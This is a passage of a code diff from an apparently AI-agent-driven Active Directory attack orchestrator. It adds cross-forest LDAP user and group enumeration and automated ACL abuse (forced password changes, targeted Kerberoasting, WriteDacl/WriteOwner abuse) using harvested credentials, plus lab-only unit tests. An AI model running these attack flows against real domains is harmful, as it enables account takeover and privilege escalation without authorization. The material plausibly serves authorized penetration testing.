interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + // Wait for initial credential discovery and cross-domain pivots. + tokio::time::sleep(Duration::from_secs(120)).await; + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("cross_forest_enum") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_cross_forest_work(&state) + }; + if work.is_empty() { + continue; + } + + for item in work { + // Dispatch user enumeration + let mut user_payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": [ + "sAMAccountName", "description", "memberOf", + "userAccountControl", "servicePrincipalName", + "msDS-AllowedToDelegateTo", "adminCount" + ], + "cross_forest": true, + "instructions": concat!( + "This is a cross-forest enumeration task. Enumerate ALL users in the ", + "target domain via LDAP. If the credential is from a different domain, ", + "authenticate via the forest trust. Report every user found with their ", + "group memberships, SPNs, delegation settings, and description fields. ", + "Pay special attention to accounts with adminCount=1, ", + "DoesNotRequirePreAuth, or interesting SPNs.\n\n", + "IMPORTANT: For each user found, include them in the discovered_users ", + "array with EXACTLY this JSON format:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}\n", + "Also report users with DoesNotRequirePreAuth as vulnerabilities with ", + "vuln_type='asrep_roastable', and users with SPNs as vuln_type='kerberoastable'." + ), + }); + if let Some(bind_domain) = + bind_domain_for_cross_forest(&item.credential.domain, &item.domain) + { + user_payload["bind_domain"] = json!(bind_domain); + } + + let priority = dispatcher.effective_priority("cross_forest_enum"); + match dispatcher + .throttled_submit("recon", "recon", user_payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + cred_user = %item.credential.username, + cred_domain = %item.credential.domain, + under_enumerated = item.is_under_enumerated, + "Cross-forest user enumeration dispatched" + ); + } + Ok(None) => { + debug!(domain = %item.domain, "Cross-forest user enum deferred"); + continue; // Don't mark as processed if deferred + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch cross-forest user enum"); + continue; + } + } + + // Also dispatch group enumeration for the same domain + let mut group_payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description" + ], + "enumerate_members": true, + "resolve_foreign_principals": true, + "cross_forest": true, + "instructions": concat!( + "Enumerate ALL security groups in this domain and their members. ", + "Resolve Foreign Security Principals to their source domain. ", + "Report group name, type (Global/DomainLocal/Universal), members, ", + "and managed-by. This is critical for mapping cross-domain attack paths.\n\n", + "IMPORTANT: For each user found in any group, include them in the ", + "discovered_users array with EXACTLY this JSON format:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}" + ), + }); + if let Some(bind_domain) = + bind_domain_for_cross_forest(&item.credential.domain, &item.domain) + { + group_payload["bind_domain"] = json!(bind_domain); + } + + let group_priority = dispatcher.effective_priority("group_enumeration"); + if let Ok(Some(task_id)) = dispatcher + .throttled_submit("recon", "recon", group_payload, group_priority) + .await + { + info!( + task_id = %task_id, + domain = %item.domain, + "Cross-forest group enumeration dispatched" + ); + } + + // Mark as processed + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CROSS_FOREST_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CROSS_FOREST_ENUM, &item.dedup_key) + .await; + } + } +} + +struct CrossForestWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, + is_under_enumerated: bool, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn is_cross_forest_same_domain() { + assert!(!is_cross_forest("contoso.local", "contoso.local")); + } + + #[test] + fn is_cross_forest_child_domain() { + assert!(!is_cross_forest("child.contoso.local", "contoso.local")); + } + + #[test] + fn is_cross_forest_parent_domain() { + assert!(!is_cross_forest("contoso.local", "child.contoso.local")); + } + + #[test] + fn is_cross_forest_different_forests() { + assert!(is_cross_forest("contoso.local", "fabrikam.local")); + } + + #[test] + fn is_cross_forest_case_insensitive() { + assert!(!is_cross_forest("CONTOSO.LOCAL", "contoso.local")); + assert!(is_cross_forest("CONTOSO.LOCAL", "fabrikam.local")); + } + + #[test] + fn dedup_key_format() { + let key = cross_forest_dedup_key("fabrikam.local", "Admin", "CONTOSO.LOCAL"); + assert_eq!(key, "xforest:fabrikam.local:admin@contoso.local"); + } + + #[test] + fn dedup_key_case_insensitive() { + let k1 = cross_forest_dedup_key("FABRIKAM.LOCAL", "Admin", "contoso.local"); + let k2 = cross_forest_dedup_key("fabrikam.local", "admin", "CONTOSO.LOCAL"); + assert_eq!(k1, k2); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_CROSS_FOREST_ENUM, "cross_forest_enum"); + } + + #[test] + fn bind_domain_added_for_foreign_forest() { + assert_eq!( + bind_domain_for_cross_forest("contoso.local", "fabrikam.local"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn bind_domain_omitted_for_same_domain() { + assert_eq!( + bind_domain_for_cross_forest("contoso.local", "contoso.local"), + None + ); + } + + #[test] + fn bind_domain_omitted_when_credential_domain_empty() { + assert_eq!(bind_domain_for_cross_forest("", "fabrikam.local"), None); + } + + #[test] + fn is_cross_forest_empty_strings() { + // Empty strings are equal (same empty domain) + assert!(!is_cross_forest("", "")); + } + + #[test] + fn is_cross_forest_one_empty() { + assert!(is_cross_forest("contoso.local", "")); + assert!(is_cross_forest("", "contoso.local")); + } + + #[test] + fn is_cross_forest_deeply_nested() { + assert!(!is_cross_forest("a.b.contoso.local", "contoso.local")); + assert!(!is_cross_forest("contoso.local", "a.b.contoso.local")); + } + + #[test] + fn cross_forest_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CrossForestWork { + dedup_key: "xforest:fabrikam.local:admin@contoso.local".into(), + domain: "fabrikam.local".into(), + dc_ip: "192.168.58.20".into(), + credential: cred, + is_under_enumerated: true, + }; + assert!(work.is_under_enumerated); + assert_eq!(work.domain, "fabrikam.local"); + } + + #[test] + fn user_enum_payload_structure() { + let payload = serde_json::json!({ + "technique": "ldap_user_enumeration", + "target_ip": "192.168.58.20", + "domain": "fabrikam.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + "cross_forest": true, + }); + assert_eq!(payload["technique"], "ldap_user_enumeration"); + assert!(payload["cross_forest"].as_bool().unwrap()); + assert_eq!(payload["domain"], "fabrikam.local"); + } + + #[test] + fn group_enum_payload_structure() { + let payload = serde_json::json!({ + "technique": "ldap_group_enumeration", + "target_ip": "192.168.58.20", + "domain": "fabrikam.local", + "resolve_foreign_principals": true, + "cross_forest": true, + }); + assert_eq!(payload["technique"], "ldap_group_enumeration"); + assert!(payload["resolve_foreign_principals"].as_bool().unwrap()); + } + + #[test] + fn coverage_threshold_values() { + // Module uses: known_user_count >= 5 || known_hash_count >= 10 + let known_user_count = 4; + let known_hash_count = 9; + assert!(known_user_count < 5 && known_hash_count < 10); // should trigger enum + + let known_user_count2 = 5; + assert!(known_user_count2 >= 5); // should skip + + let known_hash_count2 = 10; + assert!(known_hash_count2 >= 10); // should skip + } + + #[test] + fn under_enumerated_threshold() { + // is_under_enumerated = known_user_count < 3 + let counts = [0_usize, 2, 3, 5]; + assert!(counts[0] < 3); // 0 users = under-enumerated + assert!(counts[1] < 3); // 2 users = under-enumerated + assert!(counts[2] >= 3); // 3 users = not under-enumerated + } + + // --- collect_cross_forest_work tests --- + + fn make_cred( + id: &str, + user: &str, + pass: &str, + domain: &str, + admin: bool, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: id.into(), + username: user.into(), + password: pass.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: admin, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_hash(user: &str, domain: &str) -> ares_core::models::Hash { + ares_core::models::Hash { + id: format!("h-{user}"), + username: user.into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee:deadbeef".into(), + hash_type: "ntlm".into(), + domain: domain.into(), + cracked_password: None, + source: "test".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + } + } + + #[tokio::test] + async fn collect_empty_state_no_work() { + let state = SharedState::new("test".into()); + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_single_domain_no_work() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.credentials.push(make_cred( + "c1", + "user1", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty(), "single domain should produce no work"); + } + + #[tokio::test] + async fn collect_no_credentials_no_work() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty(), "no credentials should produce no work"); + } + + #[tokio::test] + async fn collect_two_domains_with_cross_forest_cred() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // Should produce work for both domains (the cred works for contoso as same-domain, + // and for fabrikam as cross-forest). + assert!(!work.is_empty()); + // At least one item should target fabrikam + assert!(work.iter().any(|w| w.domain == "fabrikam.local")); + } + + #[tokio::test] + async fn collect_skips_domain_with_five_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 5 credentials for fabrikam = already enumerated + for i in 0..5 { + s.credentials.push(make_cred( + &format!("c{i}"), + &format!("user{i}"), + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + false, + )); + } + // Also need a cred that can authenticate + s.credentials + .push(make_cred("cx", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // fabrikam should be skipped (>= 5 creds), contoso should appear + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "domain with >= 5 credentials should be skipped" + ); + } + + #[tokio::test] + async fn collect_skips_domain_with_ten_hashes() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 10 hashes for fabrikam + for i in 0..10 { + s.hashes + .push(make_hash(&format!("hashuser{i}"), "fabrikam.local")); + } + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "domain with >= 10 hashes should be skipped" + ); + } + + #[tokio::test] + async fn collect_credential_priority_same_domain_best() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Cross-forest cred (priority 3) + s.credentials.push(make_cred( + "c1", + "crossuser", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + // Same-domain cred (priority 0) — should be selected + s.credentials.push(make_cred( + "c2", + "localuser", + "P@ssw0rd!", + "fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some(), "should produce work for fabrikam"); + assert_eq!( + fab_work.unwrap().credential.username, + "localuser", + "same-domain credential should be preferred" + ); + } + + #[tokio::test] + async fn collect_credential_priority_admin_over_same_forest() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Same-forest non-admin (priority 2) + s.credentials.push(make_cred( + "c1", + "forestuser", + "P@ssw0rd!", + "child.fabrikam.local", + false, + )); // pragma: allowlist secret + // Admin from another domain (priority 1) — should win + s.credentials.push(make_cred( + "c2", + "adminuser", + "P@ssw0rd!", + "contoso.local", + true, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert_eq!( + fab_work.unwrap().credential.username, + "adminuser", + "admin credential should be preferred over same-forest non-admin" + ); + } + + #[tokio::test] + async fn collect_credential_priority_same_forest_over_cross_forest() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Cross-forest non-admin (priority 3) + s.credentials.push(make_cred( + "c1", + "crossuser", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + // Same-forest non-admin (priority 2) — should win + s.credentials.push(make_cred( + "c2", + "forestuser", + "P@ssw0rd!", + "child.fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert_eq!( + fab_work.unwrap().credential.username, + "forestuser", + "same-forest credential should be preferred over cross-forest" + ); + } + + #[tokio::test] + async fn collect_skips_quarantined_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Only credential is quarantined + s.credentials.push(make_cred( + "c1", + "baduser", + "P@ssw0rd!", + "contoso.local", + true, + )); // pragma: allowlist secret + s.quarantined_credentials.insert( + "baduser@contoso.local".into(), + chrono::Utc::now() + chrono::Duration::seconds(300), + ); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.credential.username != "baduser"), + "quarantined credentials should be skipped" + ); + } + + #[tokio::test] + async fn collect_skips_empty_password_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Only credential has empty password + s.credentials + .push(make_cred("c1", "nopass", "", "contoso.local", true)); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // No usable credential → should produce no work for fabrikam + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "empty password credentials should not produce work" + ); + } + + #[tokio::test] + async fn collect_skips_already_processed_dedup_key() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); // pragma: allowlist secret + // Pre-mark the dedup key as processed + let key = cross_forest_dedup_key("fabrikam.local", "admin", "contoso.local"); + s.mark_processed(DEDUP_CROSS_FOREST_ENUM, key); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "already-processed dedup key should be skipped" + ); + } + + #[tokio::test] + async fn collect_under_enumerated_flag_when_few_users() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 2 fabrikam creds (< 3 = under-enumerated) + s.credentials.push(make_cred( + "c1", + "user1", + "P@ssw0rd!", + "fabrikam.local", + false, + )); // pragma: allowlist secret + s.credentials.push(make_cred( + "c2", + "user2", + "P@ssw0rd!", + "fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert!( + fab_work.unwrap().is_under_enumerated, + "domain with < 3 users should be marked under-enumerated" + ); + } + + #[tokio::test] + async fn collect_not_under_enumerated_with_three_users() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 3 fabrikam creds (>= 3 = not under-enumerated, but < 5 so still triggers enum) + for i in 0..3 { + s.credentials.push(make_cred( + &format!("c{i}"), + &format!("user{i}"), + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + false, + )); + } + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert!( + !fab_work.unwrap().is_under_enumerated, + "domain with >= 3 users should not be marked under-enumerated" + ); + } +} diff --git a/ares-cli/src/orchestrator/automation/dacl_abuse.rs b/ares-cli/src/orchestrator/automation/dacl_abuse.rs new file mode 100644 index 00000000..dbc40d05 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/dacl_abuse.rs @@ -0,0 +1,1192 @@ +//! auto_dacl_abuse -- direct ACL abuse for known attack paths. +//! +//! Unlike acl_chain_follow (which requires BloodHound to populate acl_chains), +//! this module proactively dispatches known ACL abuse techniques when: +//! - A credential is available for a user known to have dangerous permissions +//! - The target object exists in the domain +//! +//! Covers: ForceChangePassword, GenericWrite (targeted Kerberoast), WriteDacl, +//! WriteOwner, GenericAll. Each abuse type maps to a specific tool invocation +//! (e.g., net rpc password for ForceChangePassword, bloodyAD for GenericWrite). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::dedup::is_ghost_machine_account; +use crate::orchestrator::dispatcher::{Dispatcher, SubmissionOutcome}; +use crate::orchestrator::state::*; + +/// Dispatches ACL abuse when matching credentials + bloodhound paths exist. +/// Interval: 30s. +pub async fn auto_dacl_abuse(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("dacl_abuse") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_dacl_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "dacl_abuse", + "acl_type": item.vuln_type, + "vuln_id": item.vuln_id, + "source_user": item.source_user, + "target_user": item.target_user, + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("dacl_abuse"); + // Mark dedup on Submitted OR Deferred to prevent the 30s tick from + // re-emitting identical work each cycle and bloating the deferred + // ZSET past its per-type cap (which silently drops entries). Only + // skip dedup on Dropped — those need to be reconsidered next tick. + let mark_dedup = match dispatcher + .throttled_submit_outcome("acl_chain_step", "acl", payload, priority) + .await + { + Ok(SubmissionOutcome::Submitted(task_id)) => { + info!( + task_id = %task_id, + vuln_id = %item.vuln_id, + acl_type = %item.vuln_type, + source = %item.source_user, + target = %item.target_user, + "DACL abuse dispatched" + ); + true + } + Ok(SubmissionOutcome::Deferred) => { + debug!(vuln_id = %item.vuln_id, "DACL abuse deferred (will retry via deferred drain)"); + true + } + Ok(SubmissionOutcome::Dropped) => { + debug!(vuln_id = %item.vuln_id, "DACL abuse dropped (will reconsider next tick)"); + false + } + Err(e) => { + warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch DACL abuse"); + false + } + }; + if mark_dedup { + { + let mut state = dispatcher.state.write().await; + state.mark_processed(DEDUP_DACL_ABUSE, item.dedup_key.clone()); + } + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DACL_ABUSE, &item.dedup_key) + .await; + } + } + } +} + +/// Collect DACL abuse work items from state without holding async locks. +/// +/// Extracted for testability: scans `discovered_vulnerabilities` for ACL-type +/// vulns that have a matching credential and haven't been processed yet. +fn collect_dacl_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Check discovered_vulnerabilities for ACL-related vulns + // (populated by BloodHound analysis or recon agents) + for vuln in state.discovered_vulnerabilities.values() { + let vtype = vuln.vuln_type.to_lowercase(); + + let is_acl_vuln = vtype.contains("forcechangepassword") + || vtype.contains("genericwrite") + || vtype.contains("writedacl") + || vtype.contains("writeowner") + || vtype.contains("genericall") + || vtype.contains("self_membership") + || vtype.contains("write_membership") + || vtype.contains("writeproperty") + || vtype.contains("allextendedrights") + || vtype.contains("addmember") + || vtype.contains("addself"); + + if !is_acl_vuln { + continue; + } + + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + continue; + } + + let dedup_key = format!("dacl:{}", vuln.vuln_id); + if state.is_processed(DEDUP_DACL_ABUSE, &dedup_key) { + continue; + } + + let target_name = vuln + .details + .get("target") + .or_else(|| vuln.details.get("target_user")) + .or_else(|| vuln.details.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + if is_ghost_machine_account(target_name) { + debug!( + vuln_id = %vuln.vuln_id, + target = %target_name, + "Skipping ACL abuse for ghost machine account target" + ); + continue; + } + + // Extract source user from vuln details + let source_user = vuln + .details + .get("source") + .or_else(|| vuln.details.get("source_user")) + .or_else(|| vuln.details.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + + let source_domain = vuln + .details + .get("source_domain") + .or_else(|| vuln.details.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + + if source_user.is_empty() { + continue; + } + + // Find matching credential. + // + // BloodHound often emits ACL edges with SID principals (e.g. for + // well-known groups like Enterprise Admins). When `source` is a SID, + // resolve to any privileged credential in the source's domain so the + // ACL chain can still be exercised. + let cred = state + .credentials + .iter() + .find(|c| { + c.username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || c.domain.to_lowercase() == source_domain.to_lowercase()) + }) + .cloned() + .or_else(|| resolve_sid_principal(state, source_user, source_domain)); + + if let Some(cred) = cred { + let target_user = vuln + .details + .get("target") + .or_else(|| vuln.details.get("target_user")) + .or_else(|| vuln.details.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let dc_ip = state + .domain_controllers + .get(&cred.domain.to_lowercase()) + .cloned() + .unwrap_or_default(); + + // When BloodHound emitted the source as a raw SID and we resolved + // it via `resolve_sid_principal`, surface the resolved credential's + // SAM account name as `source_user` — not the SID. Tool schemas + // require a username for credential injection by `(user, domain)`, + // and the LLM otherwise echoes the SID as the auth principal. + let dispatched_source_user = if source_user.starts_with("S-1-5-21-") { + cred.username.clone() + } else { + source_user.to_string() + }; + + items.push(DaclWork { + dedup_key, + vuln_id: vuln.vuln_id.clone(), + vuln_type: vtype, + source_user: dispatched_source_user, + target_user, + domain: cred.domain.clone(), + dc_ip, + credential: cred, + }); + } + } + + items +} + +struct DaclWork { + dedup_key: String, + vuln_id: String, + vuln_type: String, + source_user: String, + target_user: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +/// RIDs of well-known privileged groups whose membership is owned by privileged +/// credentials in the same domain. Resolving a SID-typed source to "any DA-cred +/// in this domain" is correct for these RIDs because the abuse only requires +/// *a* member of the group, not a specific principal. +fn is_privileged_well_known_rid(rid: u32) -> bool { + matches!( + rid, + 512 // Domain Admins + | 518 // Schema Admins + | 519 // Enterprise Admins + | 520 // Group Policy Creator Owners + | 526 // Key Admins + | 527 // Enterprise Key Admins + ) +} + +/// When the ACL edge source is a SID (typically a well-known group), resolve +/// it to a credential of an actual member. +/// +/// Strategy: +/// 1. Parse `S-1-5-21-X-Y-Z-RID` and extract the domain SID prefix and RID. +/// 2. Reverse-look up the domain via `state.domain_sids` (or fall back to +/// `source_domain` from the vuln details). +/// 3. For privileged well-known RIDs, return any `is_admin` credential in +/// that domain. As a last resort, return any credential in the domain. +fn resolve_sid_principal( + state: &StateInner, + source: &str, + source_domain: &str, +) -> Option { + if !source.starts_with("S-1-5-21-") { + return None; + } + let (prefix, rid_str) = source.rsplit_once('-')?; + let rid: u32 = rid_str.parse().ok()?; + + let resolved_domain = state + .domain_sids + .iter() + .find(|(_, sid)| sid.eq_ignore_ascii_case(prefix)) + .map(|(d, _)| d.to_lowercase()) + .or_else(|| { + if source_domain.is_empty() { + None + } else { + Some(source_domain.to_lowercase()) + } + })?; + + if !is_privileged_well_known_rid(rid) { + return None; + } + + let admin = state + .credentials + .iter() + .find(|c| c.is_admin && c.domain.to_lowercase() == resolved_domain) + .cloned(); + if admin.is_some() { + return admin; + } + + state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == resolved_domain) + .cloned() +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("dacl:{}", "vuln-acl-001"); + assert_eq!(key, "dacl:vuln-acl-001"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DACL_ABUSE, "dacl_abuse"); + } + + #[test] + fn acl_vuln_type_matching() { + let positives = [ + "ForceChangePassword", + "GenericWrite", + "WriteDacl", + "WriteOwner", + "GenericAll", + "self_membership", + "write_membership", + "WriteProperty", + "AllExtendedRights", + "AddMember", + "AddSelf", + "SomePrefix_forcechangepassword_suffix", + ]; + for t in &positives { + let vtype = t.to_lowercase(); + let is_acl_vuln = vtype.contains("forcechangepassword") + || vtype.contains("genericwrite") + || vtype.contains("writedacl") + || vtype.contains("writeowner") + || vtype.contains("genericall") + || vtype.contains("self_membership") + || vtype.contains("write_membership") + || vtype.contains("writeproperty") + || vtype.contains("allextendedrights") + || vtype.contains("addmember") + || vtype.contains("addself"); + assert!(is_acl_vuln, "{t} should match as ACL vuln"); + } + } + + #[test] + fn non_acl_vuln_types_rejected() { + let negatives = [ + "smb_signing_disabled", + "mssql_access", + "zerologon", + "esc1", + "kerberoast", + ]; + for t in &negatives { + let vtype = t.to_lowercase(); + let is_acl_vuln = vtype.contains("forcechangepassword") + || vtype.contains("genericwrite") + || vtype.contains("writedacl") + || vtype.contains("writeowner") + || vtype.contains("genericall") + || vtype.contains("self_membership") + || vtype.contains("write_membership"); + assert!(!is_acl_vuln, "{t} should NOT match as ACL vuln"); + } + } + + #[test] + fn source_user_extraction_keys() { + // Verify the fallback chain for source user extraction + let details = serde_json::json!({ + "source": "admin", + "source_user": "admin2", + "from": "admin3", + }); + let source = details + .get("source") + .or_else(|| details.get("source_user")) + .or_else(|| details.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source, "admin"); + + // Fallback to source_user + let details2 = serde_json::json!({ + "source_user": "admin2", + }); + let source2 = details2 + .get("source") + .or_else(|| details2.get("source_user")) + .or_else(|| details2.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source2, "admin2"); + + // No source returns empty + let details3 = serde_json::json!({}); + let source3 = details3 + .get("source") + .or_else(|| details3.get("source_user")) + .or_else(|| details3.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source3, ""); + } + + #[test] + fn source_domain_extraction_keys() { + let details = serde_json::json!({"source_domain": "contoso.local"}); + let source_domain = details + .get("source_domain") + .or_else(|| details.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain, "contoso.local"); + + let details2 = serde_json::json!({"domain": "fabrikam.local"}); + let source_domain2 = details2 + .get("source_domain") + .or_else(|| details2.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain2, "fabrikam.local"); + + let details3 = serde_json::json!({}); + let source_domain3 = details3 + .get("source_domain") + .or_else(|| details3.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain3, ""); + } + + #[test] + fn target_user_extraction_keys() { + let details = serde_json::json!({"target": "victim", "target_user": "v2", "to": "v3"}); + let target = details + .get("target") + .or_else(|| details.get("target_user")) + .or_else(|| details.get("to")) 